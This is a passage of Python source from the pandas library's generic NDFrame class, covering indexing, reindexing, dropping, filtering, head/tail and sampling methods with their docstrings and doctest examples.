if isinstance(col, tuple) and col[:len(key)] == key:
del self[col]
deleted = True
if not deleted:
# If the above loop ran and didn't delete anything because
# there was no match, this call should raise the appropriate
# exception:
self._data.delete(key)
# delete from the caches
try:
del self._item_cache[key]
except KeyError:
pass
_shared_docs['_take'] = """
Return the elements in the given *positional* indices along an axis.
This means that we are not indexing according to actual values in
the index attribute of the object. We are indexing according to the
actual position of the element in the object.
This is the internal version of ``.take()`` and will contain a wider
selection of parameters useful for internal use but not as suitable
for public usage.
Parameters
----------
indices : array-like
An array of ints indicating which positions to take.
axis : int, default 0
The axis on which to select elements. "0" means that we are
selecting rows, "1" means that we are selecting columns, etc.
convert : bool, default True
Whether to convert negative indices into positive ones.
For example, ``-1`` would map to the ``len(axis) - 1``.
The conversions are similar to the behavior of indexing a
regular Python list.
is_copy : bool, default True
Whether to return a copy of the original object or not.
Returns
-------
taken : type of caller
An array-like containing the elements taken from the object.
See Also
--------
numpy.ndarray.take
numpy.take
"""
@Appender(_shared_docs['_take'])
def _take(self, indices, axis=0, convert=True, is_copy=True):
self._consolidate_inplace()
if convert:
indices = maybe_convert_indices(indices, len(self._get_axis(axis)))
new_data = self._data.take(indices,
axis=self._get_block_manager_axis(axis),
verify=True)
result = self._constructor(new_data).__finalize__(self)
# Maybe set copy if we didn't actually change the index.
if is_copy:
if not result._get_axis(axis).equals(self._get_axis(axis)):
result._set_is_copy(self)
return result
_shared_docs['take'] = """
Return the elements in the given *positional* indices along an axis.
This means that we are not indexing according to actual values in
the index attribute of the object. We are indexing according to the
actual position of the element in the object.
Parameters
----------
indices : array-like
An array of ints indicating which positions to take.
axis : {0 or 'index', 1 or 'columns', None}, default 0
The axis on which to select elements. ``0`` means that we are
selecting rows, ``1`` means that we are selecting columns.
convert : bool, default True
Whether to convert negative indices into positive ones.
For example, ``-1`` would map to the ``len(axis) - 1``.
The conversions are similar to the behavior of indexing a
regular Python list.
.. deprecated:: 0.21.0
In the future, negative indices will always be converted.
is_copy : bool, default True
Whether to return a copy of the original object or not.
**kwargs
For compatibility with :meth:`numpy.take`. Has no effect on the
output.
Returns
-------
taken : type of caller
An array-like containing the elements taken from the object.
See Also
--------
DataFrame.loc : Select a subset of a DataFrame by labels.
DataFrame.iloc : Select a subset of a DataFrame by positions.
numpy.take : Take elements from an array along an axis.
Examples
--------
>>> df = pd.DataFrame([('falcon', 'bird', 389.0),
... ('parrot', 'bird', 24.0),
... ('lion', 'mammal', 80.5),
... ('monkey', 'mammal', np.nan)],
... columns=['name', 'class', 'max_speed'],
... index=[0, 2, 3, 1])
>>> df
name class max_speed
0 falcon bird 389.0
2 parrot bird 24.0
3 lion mammal 80.5
1 monkey mammal NaN
Take elements at positions 0 and 3 along the axis 0 (default).
Note how the actual indices selected (0 and 1) do not correspond to
our selected indices 0 and 3. That's because we are selecting the 0th
and 3rd rows, not rows whose indices equal 0 and 3.
>>> df.take([0, 3])
name class max_speed
0 falcon bird 389.0
1 monkey mammal NaN
Take elements at indices 1 and 2 along the axis 1 (column selection).
>>> df.take([1, 2], axis=1)
class max_speed
0 bird 389.0
2 bird 24.0
3 mammal 80.5
1 mammal NaN
We may take elements using negative integers for positive indices,
starting from the end of the object, just like with Python lists.
>>> df.take([-1, -2])
name class max_speed
1 monkey mammal NaN
3 lion mammal 80.5
"""
@Appender(_shared_docs['take'])
def take(self, indices, axis=0, convert=None, is_copy=True, **kwargs):
if convert is not None:
msg = ("The 'convert' parameter is deprecated "
"and will be removed in a future version.")
warnings.warn(msg, FutureWarning, stacklevel=2)
else:
convert = True
convert = nv.validate_take(tuple(), kwargs)
return self._take(indices, axis=axis, convert=convert, is_copy=is_copy)
def xs(self, key, axis=0, level=None, drop_level=True):
"""
Returns a cross-section (row(s) or column(s)) from the
Series/DataFrame. Defaults to cross-section on the rows (axis=0).
Parameters
----------
key : object
Some label contained in the index, or partially in a MultiIndex
axis : int, default 0
Axis to retrieve cross-section on
level : object, defaults to first n levels (n=1 or len(key))
In case of a key partially contained in a MultiIndex, indicate
which levels are used. Levels can be referred by label or position.
drop_level : boolean, default True
If False, returns object with same levels as self.
Examples
--------
>>> df
A B C
a 4 5 2
b 4 0 9
c 9 7 3
>>> df.xs('a')
A 4
B 5
C 2
Name: a
>>> df.xs('C', axis=1)
a 2
b 9
c 3
Name: C
>>> df
A B C D
first second third
bar one 1 4 1 8 9
two 1 7 5 5 0
baz one 1 6 6 8 0
three 2 5 3 5 3
>>> df.xs(('baz', 'three'))
A B C D
third
2 5 3 5 3
>>> df.xs('one', level=1)
A B C D
first third
bar 1 4 1 8 9
baz 1 6 6 8 0
>>> df.xs(('baz', 2), level=[0, 'third'])
A B C D
second
three 5 3 5 3
Returns
-------
xs : Series or DataFrame
Notes
-----
xs is only for getting, not setting values.
MultiIndex Slicers is a generic way to get/set values on any level or
levels. It is a superset of xs functionality, see
:ref:`MultiIndex Slicers <advanced.mi_slicers>`
"""
axis = self._get_axis_number(axis)
labels = self._get_axis(axis)
if level is not None:
loc, new_ax = labels.get_loc_level(key, level=level,
drop_level=drop_level)
# create the tuple of the indexer
indexer = [slice(None)] * self.ndim
indexer[axis] = loc
indexer = tuple(indexer)
result = self.iloc[indexer]
setattr(result, result._get_axis_name(axis), new_ax)
return result
if axis == 1:
return self[key]
self._consolidate_inplace()
index = self.index
if isinstance(index, MultiIndex):
loc, new_index = self.index.get_loc_level(key,
drop_level=drop_level)
else:
loc = self.index.get_loc(key)
if isinstance(loc, np.ndarray):
if loc.dtype == np.bool_:
inds, = loc.nonzero()
return self._take(inds, axis=axis, convert=False)
else:
return self._take(loc, axis=axis, convert=True)
if not is_scalar(loc):
new_index = self.index[loc]
if is_scalar(loc):
new_values = self._data.fast_xs(loc)
# may need to box a datelike-scalar
#
# if we encounter an array-like and we only have 1 dim
# that means that their are list/ndarrays inside the Series!
# so just return them (GH 6394)
if not is_list_like(new_values) or self.ndim == 1:
return com._maybe_box_datetimelike(new_values)
result = self._constructor_sliced(
new_values, index=self.columns,
name=self.index[loc], dtype=new_values.dtype)
else:
result = self.iloc[loc]
result.index = new_index
# this could be a view
# but only in a single-dtyped view slicable case
result._set_is_copy(self, copy=not result._is_view)
return result
_xs = xs
def select(self, crit, axis=0):
"""Return data corresponding to axis labels matching criteria
.. deprecated:: 0.21.0
Use df.loc[df.index.map(crit)] to select via labels
Parameters
----------
crit : function
To be called on each index (label). Should return True or False
axis : int
Returns
-------
selection : type of caller
"""
warnings.warn("'select' is deprecated and will be removed in a "
"future release. You can use "
".loc[labels.map(crit)] as a replacement",
FutureWarning, stacklevel=2)
axis = self._get_axis_number(axis)
axis_name = self._get_axis_name(axis)
axis_values = self._get_axis(axis)
if len(axis_values) > 0:
new_axis = axis_values[
np.asarray([bool(crit(label)) for label in axis_values])]
else:
new_axis = axis_values
return self.reindex(**{axis_name: new_axis})
def reindex_like(self, other, method=None, copy=True, limit=None,
tolerance=None):
"""Return an object with matching indices to myself.
Parameters
----------
other : Object
method : string or None
copy : boolean, default True
limit : int, default None
Maximum number of consecutive labels to fill for inexact matches.
tolerance : optional
Maximum distance between labels of the other object and this
object for inexact matches. Can be list-like.
.. versionadded:: 0.21.0 (list-like tolerance)
Notes
-----
Like calling s.reindex(index=other.index, columns=other.columns,
method=...)
Returns
-------
reindexed : same as input
"""
d = other._construct_axes_dict(axes=self._AXIS_ORDERS, method=method,
copy=copy, limit=limit,
tolerance=tolerance)
return self.reindex(**d)
def drop(self, labels=None, axis=0, index=None, columns=None, level=None,
inplace=False, errors='raise'):
inplace = validate_bool_kwarg(inplace, 'inplace')
if labels is not None:
if index is not None or columns is not None:
raise ValueError("Cannot specify both 'labels' and "
"'index'/'columns'")
axis_name = self._get_axis_name(axis)
axes = {axis_name: labels}
elif index is not None or columns is not None:
axes, _ = self._construct_axes_from_arguments((index, columns), {})
else:
raise ValueError("Need to specify at least one of 'labels', "
"'index' or 'columns'")
obj = self
for axis, labels in axes.items():
if labels is not None:
obj = obj._drop_axis(labels, axis, level=level, errors=errors)
if inplace:
self._update_inplace(obj)
else:
return obj
def _drop_axis(self, labels, axis, level=None, errors='raise'):
"""
Drop labels from specified axis. Used in the ``drop`` method
internally.
Parameters
----------
labels : single label or list-like
axis : int or axis name
level : int or level name, default None
For MultiIndex
errors : {'ignore', 'raise'}, default 'raise'
If 'ignore', suppress error and existing labels are dropped.
"""
axis = self._get_axis_number(axis)
axis_name = self._get_axis_name(axis)
axis, axis_ = self._get_axis(axis), axis
if axis.is_unique:
if level is not None:
if not isinstance(axis, MultiIndex):
raise AssertionError('axis must be a MultiIndex')
new_axis = axis.drop(labels, level=level, errors=errors)
else:
new_axis = axis.drop(labels, errors=errors)
dropped = self.reindex(**{axis_name: new_axis})
try:
dropped.axes[axis_].set_names(axis.names, inplace=True)
except AttributeError:
pass
result = dropped
else:
labels = _ensure_object(com._index_labels_to_array(labels))
if level is not None:
if not isinstance(axis, MultiIndex):
raise AssertionError('axis must be a MultiIndex')
indexer = ~axis.get_level_values(level).isin(labels)
else:
indexer = ~axis.isin(labels)
if errors == 'raise' and indexer.all():
raise KeyError('{} not found in axis'.format(labels))
slicer = [slice(None)] * self.ndim
slicer[self._get_axis_number(axis_name)] = indexer
result = self.loc[tuple(slicer)]
return result
def _update_inplace(self, result, verify_is_copy=True):
"""
Replace self internals with result.
Parameters
----------
verify_is_copy : boolean, default True
provide is_copy checks
"""
# NOTE: This does *not* call __finalize__ and that's an explicit
# decision that we may revisit in the future.
self._reset_cache()
self._clear_item_cache()
self._data = getattr(result, '_data', result)
self._maybe_update_cacher(verify_is_copy=verify_is_copy)
def add_prefix(self, prefix):
"""
Prefix labels with string `prefix`.
For Series, the row labels are prefixed.
For DataFrame, the column labels are prefixed.
Parameters
----------
prefix : str
The string to add before each label.
Returns
-------
Series or DataFrame
New Series or DataFrame with updated labels.
See Also
--------
Series.add_suffix: Suffix row labels with string `suffix`.
DataFrame.add_suffix: Suffix column labels with string `suffix`.
Examples
--------
>>> s = pd.Series([1, 2, 3, 4])
>>> s
0 1
1 2
2 3
3 4
dtype: int64
>>> s.add_prefix('item_')
item_0 1
item_1 2
item_2 3
item_3 4
dtype: int64
>>> df = pd.DataFrame({'A': [1, 2, 3, 4], 'B': [3, 4, 5, 6]})
>>> df
A B
0 1 3
1 2 4
2 3 5
3 4 6
>>> df.add_prefix('col_')
col_A col_B
0 1 3
1 2 4
2 3 5
3 4 6
"""
new_data = self._data.add_prefix(prefix)
return self._constructor(new_data).__finalize__(self)
def add_suffix(self, suffix):
"""
Suffix labels with string `suffix`.
For Series, the row labels are suffixed.
For DataFrame, the column labels are suffixed.
Parameters
----------
suffix : str
The string to add after each label.
Returns
-------
Series or DataFrame
New Series or DataFrame with updated labels.
See Also
--------
Series.add_prefix: Prefix row labels with string `prefix`.
DataFrame.add_prefix: Prefix column labels with string `prefix`.
Examples
--------
>>> s = pd.Series([1, 2, 3, 4])
>>> s
0 1
1 2
2 3
3 4
dtype: int64
>>> s.add_suffix('_item')
0_item 1
1_item 2
2_item 3
3_item 4
dtype: int64
>>> df = pd.DataFrame({'A': [1, 2, 3, 4], 'B': [3, 4, 5, 6]})
>>> df
A B
0 1 3
1 2 4
2 3 5
3 4 6
>>> df.add_suffix('_col')
A_col B_col
0 1 3
1 2 4
2 3 5
3 4 6
"""
new_data = self._data.add_suffix(suffix)
return self._constructor(new_data).__finalize__(self)
_shared_docs['sort_values'] = """
Sort by the values along either axis
Parameters
----------%(optional_by)s
axis : %(axes_single_arg)s, default 0
Axis to be sorted
ascending : bool or list of bool, default True
Sort ascending vs. descending. Specify list for multiple sort
orders. If this is a list of bools, must match the length of
the by.
inplace : bool, default False
if True, perform operation in-place
kind : {'quicksort', 'mergesort', 'heapsort'}, default 'quicksort'
Choice of sorting algorithm. See also ndarray.np.sort for more
information. `mergesort` is the only stable algorithm. For
DataFrames, this option is only applied when sorting on a single
column or label.
na_position : {'first', 'last'}, default 'last'
`first` puts NaNs at the beginning, `last` puts NaNs at the end
Returns
-------
sorted_obj : %(klass)s
Examples
--------
>>> df = pd.DataFrame({
... 'col1' : ['A', 'A', 'B', np.nan, 'D', 'C'],
... 'col2' : [2, 1, 9, 8, 7, 4],
... 'col3': [0, 1, 9, 4, 2, 3],
... })
>>> df
col1 col2 col3
0 A 2 0
1 A 1 1
2 B 9 9
3 NaN 8 4
4 D 7 2
5 C 4 3
Sort by col1
>>> df.sort_values(by=['col1'])
col1 col2 col3
0 A 2 0
1 A 1 1
2 B 9 9
5 C 4 3
4 D 7 2
3 NaN 8 4
Sort by multiple columns
>>> df.sort_values(by=['col1', 'col2'])
col1 col2 col3
1 A 1 1
0 A 2 0
2 B 9 9
5 C 4 3
4 D 7 2
3 NaN 8 4
Sort Descending
>>> df.sort_values(by='col1', ascending=False)
col1 col2 col3
4 D 7 2
5 C 4 3
2 B 9 9
0 A 2 0
1 A 1 1
3 NaN 8 4
Putting NAs first
>>> df.sort_values(by='col1', ascending=False, na_position='first')
col1 col2 col3
3 NaN 8 4
4 D 7 2
5 C 4 3
2 B 9 9
0 A 2 0
1 A 1 1
"""
def sort_values(self, by=None, axis=0, ascending=True, inplace=False,
kind='quicksort', na_position='last'):
"""
NOT IMPLEMENTED: do not call this method, as sorting values is not
supported for Panel objects and will raise an error.
"""
raise NotImplementedError("sort_values has not been implemented "
"on Panel or Panel4D objects.")
_shared_docs['sort_index'] = """
Sort object by labels (along an axis)
Parameters
----------
axis : %(axes)s to direct sorting
level : int or level name or list of ints or list of level names
if not None, sort on values in specified index level(s)
ascending : boolean, default True
Sort ascending vs. descending
inplace : bool, default False
if True, perform operation in-place
kind : {'quicksort', 'mergesort', 'heapsort'}, default 'quicksort'
Choice of sorting algorithm. See also ndarray.np.sort for more
information. `mergesort` is the only stable algorithm. For
DataFrames, this option is only applied when sorting on a single
column or label.
na_position : {'first', 'last'}, default 'last'
`first` puts NaNs at the beginning, `last` puts NaNs at the end.
Not implemented for MultiIndex.
sort_remaining : bool, default True
if true and sorting by level and index is multilevel, sort by other
levels too (in order) after sorting by specified level
Returns
-------
sorted_obj : %(klass)s
"""
@Appender(_shared_docs['sort_index'] % dict(axes="axes", klass="NDFrame"))
def sort_index(self, axis=0, level=None, ascending=True, inplace=False,
kind='quicksort', na_position='last', sort_remaining=True):
inplace = validate_bool_kwarg(inplace, 'inplace')
axis = self._get_axis_number(axis)
axis_name = self._get_axis_name(axis)
labels = self._get_axis(axis)
if level is not None:
raise NotImplementedError("level is not implemented")
if inplace:
raise NotImplementedError("inplace is not implemented")
sort_index = labels.argsort()
if not ascending:
sort_index = sort_index[::-1]
new_axis = labels.take(sort_index)
return self.reindex(**{axis_name: new_axis})
_shared_docs['reindex'] = """
Conform %(klass)s to new index with optional filling logic, placing
NA/NaN in locations having no value in the previous index. A new object
is produced unless the new index is equivalent to the current one and
copy=False
Parameters
----------
%(optional_labels)s
%(axes)s : array-like, optional (should be specified using keywords)
New labels / index to conform to. Preferably an Index object to
avoid duplicating data
%(optional_axis)s
method : {None, 'backfill'/'bfill', 'pad'/'ffill', 'nearest'}, optional
method to use for filling holes in reindexed DataFrame.
Please note: this is only applicable to DataFrames/Series with a
monotonically increasing/decreasing index.
* default: don't fill gaps
* pad / ffill: propagate last valid observation forward to next
valid
* backfill / bfill: use next valid observation to fill gap
* nearest: use nearest valid observations to fill gap
copy : boolean, default True
Return a new object, even if the passed indexes are the same
level : int or name
Broadcast across a level, matching Index values on the
passed MultiIndex level
fill_value : scalar, default np.NaN
Value to use for missing values. Defaults to NaN, but can be any
"compatible" value
limit : int, default None
Maximum number of consecutive elements to forward or backward fill
tolerance : optional
Maximum distance between original and new labels for inexact
matches. The values of the index at the matching locations most
satisfy the equation ``abs(index[indexer] - target) <= tolerance``.
Tolerance may be a scalar value, which applies the same tolerance
to all values, or list-like, which applies variable tolerance per
element. List-like includes list, tuple, array, Series, and must be
the same size as the index and its dtype must exactly match the
index's type.
.. versionadded:: 0.21.0 (list-like tolerance)
Examples
--------
``DataFrame.reindex`` supports two calling conventions
* ``(index=index_labels, columns=column_labels, ...)``
* ``(labels, axis={'index', 'columns'}, ...)``
We *highly* recommend using keyword arguments to clarify your
intent.
Create a dataframe with some fictional data.
>>> index = ['Firefox', 'Chrome', 'Safari', 'IE10', 'Konqueror']
>>> df = pd.DataFrame({
... 'http_status': [200,200,404,404,301],
... 'response_time': [0.04, 0.02, 0.07, 0.08, 1.0]},
... index=index)
>>> df
http_status response_time
Firefox 200 0.04
Chrome 200 0.02
Safari 404 0.07
IE10 404 0.08
Konqueror 301 1.00
Create a new index and reindex the dataframe. By default
values in the new index that do not have corresponding
records in the dataframe are assigned ``NaN``.
>>> new_index= ['Safari', 'Iceweasel', 'Comodo Dragon', 'IE10',
... 'Chrome']
>>> df.reindex(new_index)
http_status response_time
Safari 404.0 0.07
Iceweasel NaN NaN
Comodo Dragon NaN NaN
IE10 404.0 0.08
Chrome 200.0 0.02
We can fill in the missing values by passing a value to
the keyword ``fill_value``. Because the index is not monotonically
increasing or decreasing, we cannot use arguments to the keyword
``method`` to fill the ``NaN`` values.
>>> df.reindex(new_index, fill_value=0)
http_status response_time
Safari 404 0.07
Iceweasel 0 0.00
Comodo Dragon 0 0.00
IE10 404 0.08
Chrome 200 0.02
>>> df.reindex(new_index, fill_value='missing')
http_status response_time
Safari 404 0.07
Iceweasel missing missing
Comodo Dragon missing missing
IE10 404 0.08
Chrome 200 0.02
We can also reindex the columns.
>>> df.reindex(columns=['http_status', 'user_agent'])
http_status user_agent
Firefox 200 NaN
Chrome 200 NaN
Safari 404 NaN
IE10 404 NaN
Konqueror 301 NaN
Or we can use "axis-style" keyword arguments
>>> df.reindex(['http_status', 'user_agent'], axis="columns")
http_status user_agent
Firefox 200 NaN
Chrome 200 NaN
Safari 404 NaN
IE10 404 NaN
Konqueror 301 NaN
To further illustrate the filling functionality in
``reindex``, we will create a dataframe with a
monotonically increasing index (for example, a sequence
of dates).
>>> date_index = pd.date_range('1/1/2010', periods=6, freq='D')
>>> df2 = pd.DataFrame({"prices": [100, 101, np.nan, 100, 89, 88]},
... index=date_index)
>>> df2
prices
2010-01-01 100
2010-01-02 101
2010-01-03 NaN
2010-01-04 100
2010-01-05 89
2010-01-06 88
Suppose we decide to expand the dataframe to cover a wider
date range.
>>> date_index2 = pd.date_range('12/29/2009', periods=10, freq='D')
>>> df2.reindex(date_index2)
prices
2009-12-29 NaN
2009-12-30 NaN
2009-12-31 NaN
2010-01-01 100
2010-01-02 101
2010-01-03 NaN
2010-01-04 100
2010-01-05 89
2010-01-06 88
2010-01-07 NaN
The index entries that did not have a value in the original data frame
(for example, '2009-12-29') are by default filled with ``NaN``.
If desired, we can fill in the missing values using one of several
options.
For example, to backpropagate the last valid value to fill the ``NaN``
values, pass ``bfill`` as an argument to the ``method`` keyword.
>>> df2.reindex(date_index2, method='bfill')
prices
2009-12-29 100
2009-12-30 100
2009-12-31 100
2010-01-01 100
2010-01-02 101
2010-01-03 NaN
2010-01-04 100
2010-01-05 89
2010-01-06 88
2010-01-07 NaN
Please note that the ``NaN`` value present in the original dataframe
(at index value 2010-01-03) will not be filled by any of the
value propagation schemes. This is because filling while reindexing
does not look at dataframe values, but only compares the original and
desired indexes. If you do want to fill in the ``NaN`` values present
in the original dataframe, use the ``fillna()`` method.
See the :ref:`user guide <basics.reindexing>` for more.
Returns
-------
reindexed : %(klass)s
"""
# TODO: Decide if we care about having different examples for different
# kinds
@Appender(_shared_docs['reindex'] % dict(axes="axes", klass="NDFrame",
optional_labels="",
optional_axis=""))
def reindex(self, *args, **kwargs):
# construct the args
axes, kwargs = self._construct_axes_from_arguments(args, kwargs)
method = missing.clean_reindex_fill_method(kwargs.pop('method', None))
level = kwargs.pop('level', None)
copy = kwargs.pop('copy', True)
limit = kwargs.pop('limit', None)
tolerance = kwargs.pop('tolerance', None)
fill_value = kwargs.pop('fill_value', np.nan)
# Series.reindex doesn't use / need the axis kwarg
# We pop and ignore it here, to make writing Series/Frame generic code
# easier
kwargs.pop("axis", None)
if kwargs:
raise TypeError('reindex() got an unexpected keyword '
'argument "{0}"'.format(list(kwargs.keys())[0]))
self._consolidate_inplace()
# if all axes that are requested to reindex are equal, then only copy
# if indicated must have index names equal here as well as values
if all(self._get_axis(axis).identical(ax)
for axis, ax in axes.items() if ax is not None):
if copy:
return self.copy()
return self
# check if we are a multi reindex
if self._needs_reindex_multi(axes, method, level):
try:
return self._reindex_multi(axes, copy, fill_value)
except Exception:
pass
# perform the reindex on the axes
return self._reindex_axes(axes, level, limit, tolerance, method,
fill_value, copy).__finalize__(self)
def _reindex_axes(self, axes, level, limit, tolerance, method, fill_value,
copy):
"""Perform the reindex for all the axes."""
obj = self
for a in self._AXIS_ORDERS:
labels = axes[a]
if labels is None:
continue
ax = self._get_axis(a)
new_index, indexer = ax.reindex(labels, level=level, limit=limit,
tolerance=tolerance, method=method)
axis = self._get_axis_number(a)
obj = obj._reindex_with_indexers({axis: [new_index, indexer]},
fill_value=fill_value,
copy=copy, allow_dups=False)
return obj
def _needs_reindex_multi(self, axes, method, level):
"""Check if we do need a multi reindex."""
return ((com._count_not_none(*axes.values()) == self._AXIS_LEN) and
method is None and level is None and not self._is_mixed_type)
def _reindex_multi(self, axes, copy, fill_value):
return NotImplemented
_shared_docs[
'reindex_axis'] = ("""Conform input object to new index with optional
filling logic, placing NA/NaN in locations having no value in the
previous index. A new object is produced unless the new index is
equivalent to the current one and copy=False
Parameters
----------
labels : array-like
New labels / index to conform to. Preferably an Index object to
avoid duplicating data
axis : %(axes_single_arg)s
method : {None, 'backfill'/'bfill', 'pad'/'ffill', 'nearest'}, optional
Method to use for filling holes in reindexed DataFrame:
* default: don't fill gaps
* pad / ffill: propagate last valid observation forward to next
valid
* backfill / bfill: use next valid observation to fill gap
* nearest: use nearest valid observations to fill gap
copy : boolean, default True
Return a new object, even if the passed indexes are the same
level : int or name
Broadcast across a level, matching Index values on the
passed MultiIndex level
limit : int, default None
Maximum number of consecutive elements to forward or backward fill
tolerance : optional
Maximum distance between original and new labels for inexact
matches. The values of the index at the matching locations most
satisfy the equation ``abs(index[indexer] - target) <= tolerance``.
Tolerance may be a scalar value, which applies the same tolerance
to all values, or list-like, which applies variable tolerance per
element. List-like includes list, tuple, array, Series, and must be
the same size as the index and its dtype must exactly match the
index's type.
.. versionadded:: 0.21.0 (list-like tolerance)
Examples
--------
>>> df.reindex_axis(['A', 'B', 'C'], axis=1)
See Also
--------
reindex, reindex_like
Returns
-------
reindexed : %(klass)s
""")
@Appender(_shared_docs['reindex_axis'] % _shared_doc_kwargs)
def reindex_axis(self, labels, axis=0, method=None, level=None, copy=True,
limit=None, fill_value=np.nan):
msg = ("'.reindex_axis' is deprecated and will be removed in a future "
"version. Use '.reindex' instead.")
self._consolidate_inplace()
axis_name = self._get_axis_name(axis)
axis_values = self._get_axis(axis_name)
method = missing.clean_reindex_fill_method(method)
warnings.warn(msg, FutureWarning, stacklevel=3)
new_index, indexer = axis_values.reindex(labels, method, level,
limit=limit)
return self._reindex_with_indexers({axis: [new_index, indexer]},
fill_value=fill_value, copy=copy)
def _reindex_with_indexers(self, reindexers, fill_value=np.nan, copy=False,
allow_dups=False):
"""allow_dups indicates an internal call here """
# reindex doing multiple operations on different axes if indicated
new_data = self._data
for axis in sorted(reindexers.keys()):
index, indexer = reindexers[axis]
baxis = self._get_block_manager_axis(axis)
if index is None:
continue
index = _ensure_index(index)
if indexer is not None:
indexer = _ensure_int64(indexer)
# TODO: speed up on homogeneous DataFrame objects
new_data = new_data.reindex_indexer(index, indexer, axis=baxis,
fill_value=fill_value,
allow_dups=allow_dups,
copy=copy)
if copy and new_data is self._data:
new_data = new_data.copy()
return self._constructor(new_data).__finalize__(self)
def _reindex_axis(self, new_index, fill_method, axis, copy):
new_data = self._data.reindex_axis(new_index, axis=axis,
method=fill_method, copy=copy)
if new_data is self._data and not copy:
return self
else:
return self._constructor(new_data).__finalize__(self)
def filter(self, items=None, like=None, regex=None, axis=None):
"""
Subset rows or columns of dataframe according to labels in
the specified index.
Note that this routine does not filter a dataframe on its
contents. The filter is applied to the labels of the index.
Parameters
----------
items : list-like
List of info axis to restrict to (must not all be present)
like : string
Keep info axis where "arg in col == True"
regex : string (regular expression)
Keep info axis with re.search(regex, col) == True
axis : int or string axis name
The axis to filter on. By default this is the info axis,
'index' for Series, 'columns' for DataFrame
Returns
-------
same type as input object
Examples
--------
>>> df
one two three
mouse 1 2 3
rabbit 4 5 6
>>> # select columns by name
>>> df.filter(items=['one', 'three'])
one three
mouse 1 3
rabbit 4 6
>>> # select columns by regular expression
>>> df.filter(regex='e$', axis=1)
one three
mouse 1 3
rabbit 4 6
>>> # select rows containing 'bbi'
>>> df.filter(like='bbi', axis=0)
one two three
rabbit 4 5 6
See Also
--------
pandas.DataFrame.loc
Notes
-----
The ``items``, ``like``, and ``regex`` parameters are
enforced to be mutually exclusive.
``axis`` defaults to the info axis that is used when indexing
with ``[]``.
"""
import re
nkw = com._count_not_none(items, like, regex)
if nkw > 1:
raise TypeError('Keyword arguments `items`, `like`, or `regex` '
'are mutually exclusive')
if axis is None:
axis = self._info_axis_name
labels = self._get_axis(axis)
if items is not None:
name = self._get_axis_name(axis)
return self.reindex(
**{name: [r for r in items if r in labels]})
elif like:
def f(x):
return like in to_str(x)
values = labels.map(f)
return self.loc(axis=axis)[values]
elif regex:
def f(x):
return matcher.search(to_str(x)) is not None
matcher = re.compile(regex)
values = labels.map(f)
return self.loc(axis=axis)[values]
else:
raise TypeError('Must pass either `items`, `like`, or `regex`')
def head(self, n=5):
"""
Return the first `n` rows.
This function returns the first `n` rows for the object based
on position. It is useful for quickly testing if your object
has the right type of data in it.
Parameters
----------
n : int, default 5
Number of rows to select.
Returns
-------
obj_head : type of caller
The first `n` rows of the caller object.
See Also
--------
pandas.DataFrame.tail: Returns the last `n` rows.
Examples
--------
>>> df = pd.DataFrame({'animal':['alligator', 'bee', 'falcon', 'lion',
... 'monkey', 'parrot', 'shark', 'whale', 'zebra']})
>>> df
animal
0 alligator
1 bee
2 falcon
3 lion
4 monkey
5 parrot
6 shark
7 whale
8 zebra
Viewing the first 5 lines
>>> df.head()
animal
0 alligator
1 bee
2 falcon
3 lion
4 monkey
Viewing the first `n` lines (three in this case)
>>> df.head(3)
animal
0 alligator
1 bee
2 falcon
"""
return self.iloc[:n]
def tail(self, n=5):
"""
Return the last `n` rows.
This function returns last `n` rows from the object based on
position. It is useful for quickly verifying data, for example,
after sorting or appending rows.
Parameters
----------
n : int, default 5
Number of rows to select.
Returns
-------
type of caller
The last `n` rows of the caller object.
See Also
--------
pandas.DataFrame.head : The first `n` rows of the caller object.
Examples
--------
>>> df = pd.DataFrame({'animal':['alligator', 'bee', 'falcon', 'lion',
... 'monkey', 'parrot', 'shark', 'whale', 'zebra']})
>>> df
animal
0 alligator
1 bee
2 falcon
3 lion
4 monkey
5 parrot
6 shark
7 whale
8 zebra
Viewing the last 5 lines
>>> df.tail()
animal
4 monkey
5 parrot
6 shark
7 whale
8 zebra
Viewing the last `n` lines (three in this case)
>>> df.tail(3)
animal
6 shark
7 whale
8 zebra
"""
if n == 0:
return self.iloc[0:0]
return self.iloc[-n:]
def sample(self, n=None, frac=None, replace=False, weights=None,
random_state=None, axis=None):
"""
Return a random sample of items from an axis of object.
You can use `random_state` for reproducibility.
Parameters
----------
n : int, optional
Number of items from axis to return. Cannot be used with `frac`.
Default = 1 if `frac` = None.
frac : float, optional
Fraction of axis items to return. Cannot be used with `n`.
replace : boolean, optional
Sample with or without replacement. Default = False.
weights : str or ndarray-like, optional
Default 'None' results in equal probability weighting.
If passed a Series, will align with target object on index. Index
values in weights not found in sampled object will be ignored and
index values in sampled object not in weights will be assigned
weights of zero.
If called on a DataFrame, will accept the name of a column
when axis = 0.
Unless weights are a Series, weights must be same length as axis
being sampled.
If weights do not sum to 1, they will be normalized to sum to 1.
Missing values in the weights column will be treated as zero.
inf and -inf values not allowed.
random_state : int or numpy.random.RandomState, optional
Seed for the random number generator (if int), or numpy RandomState
object.
axis : int or string, optional
Axis to sample. Accepts axis number or name. Default is stat axis
for given data type (0 for Series and DataFrames, 1 for Panels).
Returns
-------
A new object of same type as caller.
Examples
--------
Generate an example ``Series`` and ``DataFrame``:
>>> s = pd.Series(np.random.randn(50))
>>> s.head()
0 -0.038497
1 1.820773
2 -0.972766
3 -1.598270
4 -1.095526
dtype: float64
>>> df = pd.DataFrame(np.random.randn(50, 4), columns=list('ABCD'))
>>> df.head()
A B C D
0 0.016443 -2.318952 -0.566372 -1.028078
1 -1.051921 0.438836 0.658280 -0.175797
2 -1.243569 -0.364626 -0.215065 0.057736
3 1.768216 0.404512 -0.385604 -1.457834
4 1.072446 -1.137172 0.314194 -0.046661
Next extract a random sample from both of these objects...
3 random elements from the ``Series``:
>>> s.sample(n=3)
27 -0.994689
55 -1.049016
67 -0.224565
dtype: float64
And a random 10% of the ``DataFrame`` with replacement:
>>> df.sample(frac=0.1, replace=True)
A B C D
35 1.981780 0.142106 1.817165 -0.290805
49 -1.336199 -0.448634 -0.789640 0.217116
40 0.823173 -0.078816 1.009536 1.015108
15 1.421154 -0.055301 -1.922594 -0.019696
6 -0.148339 0.832938 1.787600 -1.383767
You can use `random state` for reproducibility:
>>> df.sample(random_state=1)
A B C D
37 -2.027662 0.103611 0.237496 -0.165867
43 -0.259323 -0.583426 1.516140 -0.479118
12 -1.686325 -0.579510 0.985195 -0.460286
8 1.167946 0.429082 1.215742 -1.636041
9 1.197475 -0.864188 1.554031 -1.505264
"""
if axis is None:
axis = self._stat_axis_number
axis = self._get_axis_number(axis)
axis_length = self.shape[axis]
# Process random_state argument
rs = com._random_state(random_state)
